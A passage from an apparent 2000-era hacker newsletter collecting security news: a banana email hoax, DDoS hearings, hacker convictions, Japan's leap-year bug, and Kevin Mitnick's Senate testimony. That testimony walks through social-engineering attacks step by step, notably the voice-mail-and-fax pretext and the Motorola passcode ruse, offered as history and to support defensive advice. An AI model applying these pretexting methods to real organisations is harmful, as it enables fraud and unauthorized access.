nationwide panic," the message says. "They have secretly admitted that they feel upwards of 15,000 Americans will be affected by this but that these are acceptable numbers." The allegations prompted the CDC to debunk the claim, advising that the bacteria usually associated with the disease "frequently live in the human body." Concerns voiced to CDC "The usual route of transmission for these bacteria is from person to person," the advisory says. "Sometimes, they can be transmitted in foods, but this would be an unlikely cause for necrotizing fasciitis. FDA and CDC agree that the bacteria cannot survive long on the surface of a banana." A spokeswoman for the CDC said officials have received more than 100 calls from people wanting to know the source of the claim and whether or not it's true. The National Necrotizing Fasciitis Foundation, which researches the disease and offers support and education services, said the disease is not spread the way the hoax claims. "The mere ingestion of these bacteria would only make you sick with vomiting or diarrhea, and I'm sure this has happened to many people already as part of normal human life," said Dr. John Shieh, a consulting physician in Los Angeles. "However, this will not cause you to get a necrotizing fasciitis. Don't worry about the bananas, anyway. Most of them you buy are from the USA." Disrupting the economy? Debus said the group has not contacted law enforcement and is just trying to get the word out that the allegations are false. He said the hoax points up another way that cyber-pranksters can disrupt the economy. However, Debus said he has not seen any figures indicating a decline in banana sales. Chiquita Brands International Inc., the banana producer, issued a statement denying the allegations. "The report currently circulating on the Internet concerning Costa Rican bananas being contaminated with a rare bacteria is totally false," the company said. "Chiquita has received no reports of such contamination, and we have checked with the pertinent U.S. government agencies, which also confirm no reports of such contamination." This is not the first Internet food hoax. KFC targeted for fake chickens Earlier this year, Kentucky Fried Chicken (KFC) was hit with the rumor that they do not use real chickens in their products, and to make the claim appear real, the allegation came from a study purportedly conducted by the University of New Hampshire. KFC officials released a statement suggesting that the hoax was malicious. "This Internet hoax is intended to destroy the trust that you have placed in KFC to provide high-quality chicken meals at all of our restaurants," company officials said in a statement. "Although we hope that readers of the hoax will recognize it as obviously false, we take this or any other attack on the quality of KFC's product seriously." Rose Miller, a computer security specialist with the Computer Incident Advisory Capability (CIAC), which is part of the federal Department of Energy, posts hoax information as a public service. "We tell people how to do their own evaluations and don't believe everything you receive in an e-mail, on Web sites, because anybody can post anything," said Miller. @HWA 99.0 HNN:Feb 29th:DDoS Commentary ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Unprivileged user Do the recent denial of service attacks really count as cyber terrorism or is it more closely related to cyber vandalism? How much money was lost by the companies involved and is that really worth $37 Million of our hard earned tax dollars? Shift @HWA 100.0 HNN:Feb 29th:Two Sites in Singapore Compromised ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow The computers of of Sparkmedia and a Pacific Internet in Singapore where broken into on September 3, 1999. The perpetrator, a 15-year-old student, will most likely receive a sentence of probation as opposed to jail time due to his age. The Straits Times http://www.straitstimes.asia1.com/singapore/sin7_0229.html (404) @HWA 101.0 HNN:Feb 29th:Swedish Intruders Get Probation ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Alex Two Swedish youths who had been accused of breaking into computers owned by NASA have received probationary sentences. One of the two intruders got additional sentencing for using stolen computer equipment and committing fraud, for using stolen Internet access accounts. Hemsidan - Swedish http://nyheter.idg.se/display.pl?ID=000229-CS5 @HWA 102.0 HNN:Mar 1st:Still No Motive for DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex During testimony before the House and Senate Judiciary committees Micheal Vatis from NIPC has said that they still are unsure of a motive in the recent DDoS attacks. He went on to say that they are also unsure if the attacks where carried out by one person or several. According to Vatis the FBI is busy tracking down hundreds of which lead overseas, hampering the investigation. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000229/tc/hacker_investigation_17.html Tuesday February 29 7:11 PM ET FBI: Internet Attack Motive Unknown By TED BRIDIS AP Technology Writer WASHINGTON (AP) - Senior law enforcement officials assured Congress on Tuesday ``we are making progress'' despite serious challenges investigating the sensational attacks weeks ago against some of the Internet's most popular Web sites. Michael Vatis, head of the FBI's National Infrastructure Protection Center, said federal agents are following ``hundreds of leads,'' and he was optimistic the case will be solved. ``We continue to make good progress,'' he said. But there were important questions that Vatis candidly said he couldn't answer, suggesting no arrest was close. The FBI still has no idea of the motive for the Internet attacks or whether one group or several groups were responsible. ``I think it's too early to tell,'' Vatis told a joint congressional panel. He said FBI agents were ``looking at possible linkages between all the investigations,'' and responded to one lawmaker that it was unlikely foreign governments were involved. Deputy U.S. Attorney General Eric Holder, who also testified, assured lawmakers that ``we are making progress'' and repeated his earlier pledge to ``prosecute these people to the fullest extent that we can.'' Vatis acknowledged that investigators have been hampered because vandals sought to cover their digital trail falsifying information within the flood of data that overwhelmed Yahoo!, eBay and other major Internet sites about three weeks ago. The FBI's own Web site was overwhelmed for about three hours in a similar attack on Feb. 18. The bureau is frustrated that some computers used in the attacks failed to adequately record useful details, and some of the spurious data that disrupted service at the Web sites apparently was routed through computers overseas. ``Because parts of the evidentiary trail have led overseas, we are working through our legal attaches in many U.S. embassies abroad to work with foreign counterparts,'' Vatis said. ``Despite all these challenges, I remain optimistic that the hard work of ... that we will in the end prove to be successful.'' Panels from the House and Senate Judiciary committees organized the hearing to determine what changes, if any, are needed to existing crime laws. Holder and other federal authorities have urged Congress, for example, to reduce the $5,000 minimum in damages that victim companies must suffer before attackers can be prosecuted under federal computer crime laws. Holder called the $5,000 minimum ``a potential problem'' that might hamper some prosecutions. Some lawmakers, though, indicated they were reluctant to grant sweeping new authority to the federal government. ``Passing laws for the mere purpose of sending a message has not proven effective,'' said Rep. Robert ``Bobby'' Scott, D-Va. He said he was worried about consequences on Internet privacy and the technology industry. Rep. Bob Barr, R-Ga., said the attacks in February against commercial Web sites amounted to vandalism, not terrorism, and said he was doubtful they represented as serious a threat as biological or chemical attacks. @HWA 103.0 HNN:Mar 1st:�First Canadian Computer Crime Conviction ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acoplayse A Quebec court Tuesday convicted a 22-year-old man of electronically breaking into the computers of various government and corporate institutions. This is believed to be the first time a Canadian court has passed sentence in such a case. In a 12-page ruling, Quebec Court Justice Andre Bilodeau found Quebec City resident Pierre-Guy Lavoie guilty under Canada's criminal code of fraudulently using computer passwords to perpetrate computer crimes. He received a sentence of 12 months of probation with community service. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000229/wr/canada_hacker_1.html Tuesday February 29 7:21 PM ET Canada Court Convicts Hacker for the First Time By Patrick White QUEBEC CITY (Reuters) - A Quebec court on Tuesday convicted a 22-year-old man of hacking the computers of government and corporate institutions -- the first time a Canadian court has passed sentence in such a case. In a 12-page ruling, Quebec Court Justice Andre Bilodeau found Quebec City resident Pierre-Guy Lavoie guilty under Canada's criminal code of fraudulently using computer passwords to perpetrate computer crimes. ``The court cannot ignore the fact that the computer world which is poised to face a dazzling expansion and will become, like other types of payment or communications means invented by our societies, the theater of more and more fertile criminal acts,'' the judge wrote. Lavoie, a security consultant with the Quebec-based financial institution Desjardins-Laurentian (Toronto:DJNa.TO - news), was sentenced to 12 months of community service and placed on 12 months of probation. He was also ordered not to touch a computer or surf the Internet over the next 12 months, except on the job and under surveillance. He was found guilty of hacking hundreds of passwords, access codes to break into dozens of unauthorized government and corporate sites in 1998, including the Canadian Department of National Defense, the U.S. military, the Federal Bureau of Investigation and companies such as Bell Canada (Toronto:BCE.TO - news) and the National Bank of Canada (Toronto:NA.TO - news). The hacker, and two friends who were discharged, listed the passwords and access codes on a Web site they created called ''Corruption Addicts'' and invited surfers around the world to penetrate computer systems and hack away. ``I have learned a lesson,'' Lavoie told reporters at the Quebec City courthouse. His lawyer, Claude Dallaire, said that there were no legal precedents for this new form of cyber crime in Canada's history, noting that only a handful of hackers had been arrested in Canada. Dallaire said the court's message was loud and clear. ``The message is clear. The judge tells everybody, 'Don't play with the Internet, and don't go too far with the Internet, because you are going to pass Go and go to jail,''' she said, referring the board game, Monopoly. ``It is a message that it is a crime, and they shouldn't do it, and they will get punished for it,'' added Crown Prosecutor Pierre Lapointe. Lavoie was also convicted on Tuesday of planning to make explosives substances over the World Wide Web, through another Internet site called ``Phaust Laboratories''. For that he received a second 12-month community work sentence, to be served concurrently with the first. @HWA 104.0 HNN:Mar 1st:�Major Systems Fail in Japan On Leap Day ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Cash machines, weather and earthquake predictions system, and even a nuclear power plant had problems coping with the recent leap day. Mikio Aoki, chief government spokesman admitted that the Japanese government has been careless in preparing for the leap year bug. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_660000/660995.stm Other minor issues where reported at locations around the world. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500174980-500227322-501095064-0,00.html (404) BBC; Tuesday, 29 February, 2000, 14:40 GMT Leap year computer bug bites Japan appears to have suffered alone so far Japan has been worst hit by the Leap Year computer bug, a failure by computers to recognise the year 2000 as a leap year and add a day on 29 February. Cash machines, weather and earthquake prediction systems, and a nuclear plant were all affected and the government was forced to admit embarrassing carelessness. Chief government spokesman Mikio Aoki said the government had let down its guard after the New Year, when the millennium bug caused a number of problems. "Because everything went well then, there is no denying we were negligent this time," he said. Elsewhere in the world, the problems were rare and minor. In New Zealand, as many as 4,000 shops had trouble verifying banking transactions and in Singapore the subway system rejected some travellers' cards this time," he said. No glitches have yet been reported from Europe or the Americas. Computers in the US have did fail in leap years before. Four years ago, for instance, Arizona Lottery players could not buy tickets when machines failed. To leap or not to leap The problem results from an exception to an exception in the rule determining which years are leap years and therefore have an extra day, 29 February. Generally, leap years occur every four years, when the year is wholly divisible by four. However, years that are wholly divisible by 100 are not leap years. The confusion has arisen because not all programmers were aware that those years that are wholly divisible by 400 remain leap years, meaning 2000 is in fact a leap year. The failures in Japan, one of the world's most technologically-advanced nations, are embarrassing. They follow high-profile space rocket failures, last year's nuclear accident and hacker attacks on government computers, as well as difficulties with the millennium bug at the start of 2000. @HWA 105.0 HNN:Mar 1st:HP's Cyber Insurance Takes a Hit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acoplayse Concerns are being raised that HP's new cyber intrusion insurance package does not go far enough. It is thought that putting a commercial value on damage caused by such intruders might escalate rather than contain the problem. An analyst with Strategy Partners said that HP's $2m worth of coverage offered for an annual premium of $57,000 was nowhere near enough, particularly for financial organizations. "Denial of service will cost them millions of dollars every minute that they are out of business," he warned. (Millions of dollars every minute? I would sure like to invest in any company making millions of dollars a minute.) Silicon.com http://www.silicon.com/public/door?REQUNIQ=951720818&6004REQEVENT=&REQINT1=36001&REQSTR1=newsnow @HWA 106.0 HNN:Mar 1st:�Security Accountability is Still Low ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acoplayse CIOs of new Internet startups and e-commerce companies are not being held accountable by stockholders or the venture capitalists when it comes to security. Stockholders of Internet companies should be asking who inside the company is responsible and is being held accountable for security. If the answer is no one then you can be assured that security will continue to be a low priority. Most executive management teams choose not to take enough measures to protect its customers and systems until after a security incident of considerable magnitude has taken place and tend to be reactive instead of proactive when it comes to security. (ECommerce companies tend to blame cyber intruders when the real culprit is a severe lack of security.) Technology Evaluation http://www.technologyevaluation.com/news_analysis/02-00/NA_ST_LPT_02_28_00_1.htm CIOs Need to Be Held Accountable for Security L. Taylor - February 28th, 2000 Page 1 of 3 Event Summary While law enforcement agencies chase their tails in an international hacker hunt, hosting providers and eCommerce CIOs have surprisingly escaped the wrath of accountability. Stockholders of Internet companies should be asking who inside their investment holding is responsible and is being held accountable for security. If no one is held accountable, you can be assured that security will continue to be a low priority. All too often in Internet companies, security is an afterthought. The executive management team chooses not to take enough measures to protect its customers and systems until after a security incident of considerable magnitude has taken place. This consistent pattern of locking the barn door after the horse has been stolen has been going on in Internet companies for years. In fact, it is incredible that many large-scale corporations have experienced significant security violations and have managed to keep these violations from reaching the front page of the Wall Street Journal. Some hosting providers knowingly expose customers on insecure backend networks simply because internally security is not given a high-enough priority. Typically, getting new customers up and running has a lot higher priority than securing old customers. When it comes to provisioning new customers, hosting providers often become neglectful after the honeymoon period is over. If an Internet company is outsourcing its web hosting to a service provider, a member of the executive management team needs to be held responsible for making sure its service provider has taken due security precautions. If your service provider claims your site is secure, they should not have any qualms about their customers performing audits on them. @HWA 107.0 HNN:Mar 2nd:Mitnick to Testify at Senate Today ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by macki Kevin Mitnick will be in Washington DC today to testify before the Senate Governmental Affairs Committee as they ponder the security of the federal government's information systems. It's ironic that the same government that kept him locked for so long is now interested in hearing his opinions. The hearing is scheduled for Thursday at 10 am, Room D-342 in the Dirksen Senate Office building. (It will be interesting to see what Kevin has to say after four years in jail.) 2600 - Written Testimony http://www.2600.com/news/2000/0302-test.html Senate Press Release http://www.senate.gov/~gov_affairs/023200_press.htm Security Focus http://www.securityfocus.com/data/news/klp022900.html 2600 - Testimony KEVIN MITNICK'S WRITTEN SENATE TESTIMONY 03/02/00 Honorable Chairperson Thompson, Distinguished Senators, and Members of the Committee: My name is Kevin Mitnick. I appear before you today to discuss your efforts to create legislation that will ensure the future security and reliability of information systems owned and operated by, or on behalf of, the federal government. I am primarily self-taught. My hobby as an adolescent consisted of studying methods, tactics, and strategies used to circumvent computer security, and to learn more about how computer systems and telecommunication systems work. In 1985 I graduated cum laude in Computer Systems and Programming from a technical college in Los Angeles, California, and went on to successfully complete a post-graduate project in designing enhanced security applications that ran on top of a computer's operating system. That post-graduate project may have been one of the earliest examples of "hire the hacker:" the school's administrators realized I was hacking into their computers in ways that they couldn't prevent, and so they asked me to design security enhancements that would stop others' unauthorized access. I have 20 years experience circumventing information security measures, and can report that I have successfully compromised all systems that I targeted for unauthorized access save one. I have two years experience as a private investigator, and my responsibilities included locating people and their assets using social engineering techniques. My experience and success at accessing and obtaining information from computer systems first drew national attention when I obtained user manuals for the COSMOS computer systems (Computer Systems for Mainframe Operations) used by Pacific Bell. Ten years later the novel "Cyberpunk" was published in 1991, which purported to be a "true" accounting of my actions that resulted in my arrest on federal charges in 1988. One of the authors of that novel went on to write similarly fictionalized "reports" about me for the New York Times, including a cover story that appeared July 4, 1994. That largely fictitious story labeled me, without reason, justification, or proof, as the "world's most wanted cybercriminal." Subsequent media reports distorted that claim into the false claim that I was the first hacker on the FBI's "Ten Most Wanted" list. That false exaggeration was most recently repeated during my appearance on CNN's Burden of Proof program on February 10, 2000. Michael White of the Associated Press researched this issue with the FBI, and FBI representatives denied ever including me on their "Ten Most Wanted" list. I have gained unauthorized access to computer systems at some of the largest corporations on the planet, and have successfully penetrated some of the most resilient computer systems ever developed. I have used both technical and non-technical means to obtain the source code to various operating systems and telecommunications devices to study their vulnerabilities and their inner workings. After my arrest in 1995, I spent years as a pretrial detainee without benefit of bail, a bail hearing, and without the ability to see the evidence against me, combined circumstances which are unprecedented in U.S. history according to the research of my defense team. In March of 1999 I pled guilty to wire fraud and computer fraud. I was sentenced to 68 months in federal prison with 3 years supervised release. The supervised release restrictions imposed on me are the most restrictive conditions ever imposed on an individual in U.S. federal court, again according to the research of my defense team. The conditions of supervised release include, but are not limited to, a complete prohibition on the possession or use, for any purpose, of the following: cell phones, computers, any computer software programs, computer peripherals or support equipment, personal information assistants, modems, anything capable of accessing computer networks, and any other electronic equipment presently available or new technology that becomes available that can be converted to, or has as its function, the ability to act as a computer system or to access a computer system, computer network, or telecommunications network. In addition to these extraordinary conditions, I am prohibited from acting as a consultant or advisor to individuals or groups engaged in any computer-related activity. I am also prohibited from accessing computers, computer networks, or other forms of wireless communications myself or through third parties. I was released from federal prison on January 21, 2000, just 6 weeks ago. I served 59 months and 7 days, after earning 180 days of time off for good behavior. I am permitted to own a land line telephone. Computer Systems and Their Vulnerabilities The goal of information security is to protect the integrity, confidentiality, availability and access control to the information. Secure information is protected against tampering, disclosure, and sabotage. The practice of information security reduces the risk associated with loss of trust in the integrity of the information. Information security is comprised of four primary topics: physical security, network security, computer systems security, and personnel security. Each of these four topics deserves a complete book, if not several books, to fully document them. My presentation today is intended to provide a brief overview of these topics, and to present my recommendations for the manner in which the Committee may create effective legislation. 1. Physical Security 1.1 Uncontrolled physical access to computer systems and computer networks dramatically increases the likelihood that the system can and will suffer unauthorized access. 1.1.1 Hardware Security Computers may be locked in rooms or buildings, with guards, security cameras, and cypher-controlled doors. The greatest risk to information security in apparently secure hardware environments is represented by employees, or impostors, who appear to possess authorization to the secured space. 1.1.2 Data Security Many government agencies require formal backup procedures to ensure against data loss. Equally stringent requirements must be in place to ensure the integrity and security of those backup files. Intruders who cannot gain access to secure data but who obtain unauthorized access to data backups successfully compromise any security measures that may be in place, and with much less risk of detection. 2. Network Security 2.1 Stand-alone computers are less vulnerable than computers that are connected to any network of any kind. Computers connected to networks typically offer a higher incidence of misconfiguration, or inappropriately enabled services, than computers that are not connected to any network. The hierarchy of network "insecurity" is as follows: -- Stand-alone computer - least vulnerable -- Computer connected to a LAN, or local area network - more vulnerable -- Computer and a LAN accessible via dial-up - even more vulnerable -- Computer and LAN connected to internet -- most vulnerable of all 2.1.1 Unencrypted Network Communications Unencrypted network communications permit anyone with physical access to the network to use software to monitor all information traveling over the network, even though it?s intended for someone else. Once a network tap is installed, intruders can monitor all network traffic, and install software that enables them to capture, or "sniff," passwords from network transmissions. 2.1.2 Dial-in Access Dial-in access increases vulnerabilities by opening up an access point to anyone who can access ordinary telephone lines. Off site access increases the risk of intruders gaining access to the network by increasing the accessibility of the network and the remote computer. 3. Computer Systems Security 3.1 Computer systems that are not connected to any network present the most secure computing environment possible. However, even a brief review of standalone computer systems reveals many ways they may be compromised. 3.1.1 Operating Systems The operating systems control the functions of the computer: how information is stored, how memory is managed, and how information is displayed -- it?s the master program of the machine. At its core, the operating system is a group of discrete software programs that have been assembled into a larger program containing millions of lines of code. Large modern day operating systems cannot be thoroughly tested for security anomalies, or "holes," which represent opportunities for unauthorized access. 3.1.2 Rogue Software Programs ?Rogue? software applications can be installed surreptitiously, or with the unwitting help of another. These programs can install a ?back door?, which usually consists of programming instructions that disable obscure security settings in an operating system and that enable future access without detection; some back door programs even log the passwords used to gain access to the compromised system or systems for future use by the intruder. 3.1.3 Ineffective Passwords Computer users often choose passwords that are in the dictionary, or that have personal relevance, and are quite predictable. Static, or unchanging, passwords represent another easy method for breaching a computer system -- once a password is compromised, the user and the system administrators have no way of knowing the password is known to an intruder. Dynamic passwords, or non-dictionary passwords are problematic for many users, who write them down and keep them near their computers for easy access -- their own, or anyone who breaches physical security of the computer installation. 3.1.4 Uninstalled Software Updates Out-of-date system software containing known security problems presents an easy target to an intruder. Systems administrators cannot keep systems updated as a result of work overload, competing priorities, or ignorance. The weaknesses of systems are publicized, and out-of-date systems typically offer well-known vulnerabilities for easy access. 3.1.5 Default Installations Default installations of some operating systems disable many of the built-in security features in a given operating system. In addition, system administrators unintentionally misconfigure systems, or include unnecessary services that may lead to unauthorized access. Again, these weaknesses are widely publicized within the computing community, and default or misconfigured installations present an easy target. 4. Personnel Security 4.1 The most complex element in information security is the people who use the systems in which the information resides. Weaknesses in personnel security negate the effort and cost of the other three types of security: physical, network, and computer system security. 4.1.1 Social Engineering Social engineering, or "gagging," is defined as gaining intelligence through deception. Employees are trained to be helpful, and to do what they are told in the workplace. The skilled social engineer will use these traits to his or her advantage as they seek to gain information that will enable them to achieve their objectives. 4.1.2 Email Attachments Email attachments may be sent with covert code embedded within. Upon receiving the email, most people will launch the attachment, which can lower the security settings on the target machine without the user's knowledge. The likelihood of a successful installation using this method can be increased by following up the email submittal with a telephone call to prompt the person to open the attachment. Information Security Exploits Information security exploits are the methods, tactics, and strategies used to breach the integrity, confidentiality, availability or access control of information. Discovery of compromised information security has several consequences, the most important of which is the decline in the level of trust associated with the compromised information and systems that contain that information. Examples of typical security exploits follow. 5. Physical Security Exploits 5.1 Data Backup Exploit Using deception or sheer bravado, the intruder can walk into the off site backup storage facility, and ask for the physical data backup by pretending to be from a certain agency. The intruder can claim that particular backup is necessary to perform a data restoration. Once an intruder has physical possession of the data, the intruder can work with the data as though he possessed superuser, or system administrator, privileges. 5.2 Physical Access Exploit If an intruder gains physical access to a computer and is able to reboot it, the intruder can gain complete control of the system and bypass all security measures. An extremely powerful exploit, but one that exposes the intruder to great personal risk because they're physically present on the premises. 5.3 Network Physical Access Exploit Physical access to a network enables an intruder to install a tap on the network cable, which can be used to eavesdrop on all network traffic. Eavesdropping enables the intruder to capture passwords as they travel over the network, which will enable full access to the machines whose passwords are compromised. 6. Network Security Exploits 6.1 Network software exists that probes computers for weaknesses. Once one system weaknesses are revealed and the system is compromised, the intruder can install software (called ?sniffer? software) that compromises all systems on the network. Following that, an intruder can install software that logs the passwords used to access that compromised machine. Users routinely use the same or similar passwords across multiple machines; thus, once one password for one machine is obtained, then multiple machines can be compromised (see "Personnel Security Exploits"). 7. Computer System Exploits 7.1 Vulnerabilities in programs (e.g., the UNIX program sendmail) can be exploited to gain remote access to the target computer. Many system programs contain bugs that enable the intruder to trick the software into behaving in a way other than that which is intended in order to gain unauthorized access rights, even though the application is a part of the operating system of the computer. 7.2 A misconfigured installation on a computer in operation at the Raleigh News and Observer, a paper in Raleigh, North Carolina, demonstrates the problematic aspect of system misconfiguration. Using the UNIX program ?Finger,? which enables one to identify the users that are currently logged into a computer system, I created a user name on the computer system I controlled. The user name I assigned myself matched exactly the user name that existed on the target host. The misconfigured system was set to ?trust? any computer on the network, which left the entire network open for unauthorized access. 8. Personnel Security Exploits 8.1 Social Engineering -- involves tricking or persuading people to reveal information or to take certain actions at the behest of the intruder. My work as a private investigator relied heavily on my skills in social engineering. In my successful efforts to social engineer my way into Motorola, I used a three-level social engineering attack to bypass the information security measures then in use. First I was able to convince Motorola Operations employees to provide me, on repeated occasions, the pass code on their security access device, as well as the static PIN. The reason this was so extraordinary is that the pass code on their access device changed every 60 seconds: every time I wanted to gain unauthorized access, I had to call the Operations Center and ask for the password in effect for that minute. The second level involved convincing the employees to enable an account for my use on one of their machines, and the third level involved convincing one of the engineers who was already entitled to access one of the computers to give me his password. I overcame that engineer's vigorous reluctance to provide the password by convincing him that I was a Motorola employee, and that I was looking at a form that documented the password that he used to access his personal workstation on Motorola's network -- despite the fact that he never filled out any such form! Once I gained access to that machine, I obtained Telnet access to the target machine, access which I had sought all along. 8.2 Voice Mail and Fax Exploit This exploit relies on convincing an employee at a large company to enable a voice mailbox: the intruder would call the people who administer the voice mailboxes for the target company and request a mailbox. The pretext would be that the intruder works for a different division, and would like to retrieve messages without making a toll call. Once the intruder has access to the voice mail system, the intruder would call the receptionist, represent himself as an employee of the company, and ask that they take messages for him; last but not least, the intruder would request the fax number and ask that incoming faxes be held for pickup. This sets the stage for the call to the target division of the company. At this point, the intruder would call the target division to initiate the fax exploit with the goal of obtaining the targeted confidential company information. During that call the intruder would identify himself as an employee of the division whose voice mail and fax systems have just been compromised, he would cite the voice mail box in support of his identity, and would social engineer the target employee into faxing the target information to the compromised fax number located at one of their other offices. Now the intruder would call the receptionist, tell the receptionist that he's in a business meeting, and ask that the receptionist fax the confidential material "to the hotel." The intruder picks up the fax containing confidential information at the secondary fax, which cannot be traced back to either the intruder or the targeted company. I used this exploit to successfully compromise ATT's protected network access points routinely. ATT had learned that a system had been compromised by unauthorized entry at a central network access point called "DataKit." They imposed network access passwords on all DataKits to inhibit unauthorized access. I contacted one of the manager's secretaries and used the Fax Exploit to convince the secretary to fax me the password that enabled access to a DataKit that controlled dial-up access to ATT's worldwide computer network. 9. Recommendations The Voice Mail and Fax Exploit demonstrates the most important element in my testimony today: that verification mechanisms are the weak link in information security, and voice mail and fax are the tools used to verify the authenticity of the credentials presented by someone seeking physical, network, or computer systems access. The methods that will most effectively minimize the ability of intruders to compromise information security are comprehensive user training and education. Enacting policies and procedures simply won't suffice. Even with oversight the policies and procedures may not be effective: my access to Motorola, Nokia, ATT, Sun depended upon the willingness of people to bypass policies and procedures that were in place for years before I compromised them successfully. The corporate security measures that I breached were created by some of the best and brightest in the business, some of whom may even have been consulted by the committee as you drafted your legislation, Senate Bill S1993. S1993 is represents a good first step toward the goal of increasing information security on government computer systems. I have several recommendations that I hope will increase the effectiveness of your bill. 1. Each agency perform a thorough risk assessment of the assets they want to protect. 2. Perform a cost-benefit analysis to determine whether the price to protect those systems represents real value. 3. Implement policies, procedures, standards and guidelines consistent with the risk assessment and cost benefit analyses. Employee training to recognize sophisticated social engineering attacks is of paramount importance. 4. After implementing the policies, procedures, standards and guidelines, create an audit and oversight program that measures compliance throughout the affected government agencies. The frequency of those audits ought to be determined consistent with the mission of a particular agency: the more valuable the data, the more frequent the audit process. 5. Create a numeric "trust ranking" that quantifies and summarizes the results of the audit and oversight programs described above. The numeric "trust ranking" would provide at-a-glance ranking -- a report card, if you will -- of the characteristics that comprise the four major categories defined above: physical, network, computer systems, and personnel. 6. Effective audit procedures -- implemented from the top down -- must be part of an appropriate system of rewards and consequences in order to motivate system administrators, personnel managers, and government employees to maintain effective information security consistent with the goals of this committee. Conclusion Obviously a brief presentation such as the one I've made today cannot convey adequately the measures needed to implement effective information security measures. I'm happy to answer any questions that may have been left unanswered for any members of the Committee. -=- Senate Press Release: FEBRUARY 23, 2000 THOMPSON/LIEBERMAN ANNOUNCE HEARING TO BETTER PROTECT GOVERNMENT COMPUTERS FROM CYBERATTACK Washington, DC -- Senate Governmental Affairs Chairman Fred Thompson (R-TN) and Ranking Member Joseph I. Lieberman (D-CT) announced today that the Committee will hold a March 2 hearing to discuss the security of the federal government�s information systems. "We know that federal agencies continue to use a band-aid approach to computer security rather than addressing the systemic problems which make government systems vulnerable to repeated computer attacks," said Thompson. "Hopefully, the recent breaches of security at the various �dot.com� companies is the wake-up call needed to focus attention on the security of government computer systems. This Committee has been looking at the federal government's use of computers since the passage of the Brooks Act in 1965. Since I became chairman of the Committee in 1997, we heave heard from security experts, senior government officials and the General Accounting Office about the persistent security risks associated with the government�s information holdings." Senator Lieberman added, "The simple and frightening fact is, government computer systems are vulnerable to the kinds of attacks e-businesses have been suffering lately - and worse. Lax government computer security threatens our national security, our transportation and emergency services, our banking and finance. And if this weren't cataclysmic enough, it also leaves the most personal information of all our taxpayers - our veterans, our elderly, our sick - vulnerable to exposure and exploitation. Scores of government systems have already been hacked although fortunately, none of the intrusions to date has been damaging. But let's face it: it's only a matter of time." The March 2 hearing will explore the human side of computer security as it relates to successfully implementing a sound government computer security program. On November 19, 1999, Thompson and Lieberman introduced S. 1993, the Government Information Security Act that provides a framework for how the government could make its systems more secure while simultaneously providing continuous, uninterrupted services to the public. The legislation is based on Governmental Affairs Committee hearings and a GAO best practices study. -=- Security Focus: Mr. Mitnick Goes to Washington February 29, 12:44 PM PST By Kevin Poulsen WASHINGTON (SecurityFocus.com News) - A little over one month after his release from prison, famed hacker Kevin Mitnick will testify before the Senate Committee on Governmental Affairs on Thursday morning, in a hearing planned to address the security of the federal government's computer networks. Committee chairman Fred Thompson (R-TN) and ranking member Joseph Lieberman (D-CT) announced the hearing last Wednesday - one of a flurry of congressional hearings to follow this month's crippling denial of service attacks on various high-traffic Internet sites. The witness list was made public this afternoon, and also includes James Adams from computer security company iDefense, Cisco's Ken Watson, and two government experts. Mitnick, arguably the world's most famous recreational computer intruder, plead guilty in March of 1999 to seven felonies, and admitted to cracking computers belonging to cell phone companies and computer makers, including Motorola (NYSE: MOT), Fujtsu and Sun Microsystems (Nasdaq: SUNW). He was freed January 21st, after nearly five years behind bars. In a public statement following his release, Mitnick sharply criticized federal prosecutors and the media for their handling of his case. According to Greg Vinson, one of Mitnick's attorneys, Thursday's testimony will have a different focus. "He's testifying about his experience with system vulnerabilities and ways to make government's computer systems more secure," said Vinson. @HWA 108.0 HNN:Mar 2nd:Utah Passes Net Filtering Law ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Odin Late last month voters in the general primary of Michigan defeated a ballot initiative to prevent Internet filtering in libraries. Now in Utah, the State Senate has voted 28-0 to withhold funding from state libraries that do not implement internet filters. So, despite numerous others states voting against this measure, it is still being imposed on the citizens of Utah. (Are the State Senators of Utah accurately representing their constituents?) USAToday http://www.usatoday.com/life/cyber/tech/cth467.htm 02/29/00- Updated 02:05 PM ET Utah eyes Net filters for libraries SALT LAKE CITY (AP) - The Utah Senate gave final legislative approval Monday to a bill that would withhold state funding from libraries that fail to shield Web sites featuring obscene material from children younger than 18. The Senate vote was 28-0. A number of Utah libraries already use filtering programs to shield minors from pornography. Also Monday, the Utah House voted to take Playboy out of prisons. The House gave final legislative approval to a measure banning from prisons, jails and juvenile detention centers any magazine, book, pamphlet, newsletter, stationery, greeting card or video that ''features nudity.'' The bills now go to Gov. Mike Leavitt, who has not announced his position on either piece of legislation. @HWA 109.0 HNN:Mar 2nd:Restaurants Gather Data on Customers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Odin Forget credit card companies, or web advertisers; the real privacy invaders may actually be restaurants. Restaurants that keep track of what you eat, how much of it, what you like, how much you tip, how much wine you drink, who you come in with, etc. With cameras mounted over your table gathering personal data has become extremely easy.(Seems like everyone wants a database these days, now who is going to be the first to put them all together?) NY Times http://www.nytimes.com/library/dining/030100video-privacy.html (Pay to play...) @HWA 110.0 HNN:Mar 2nd:Expedia Takes Charge for Fraud 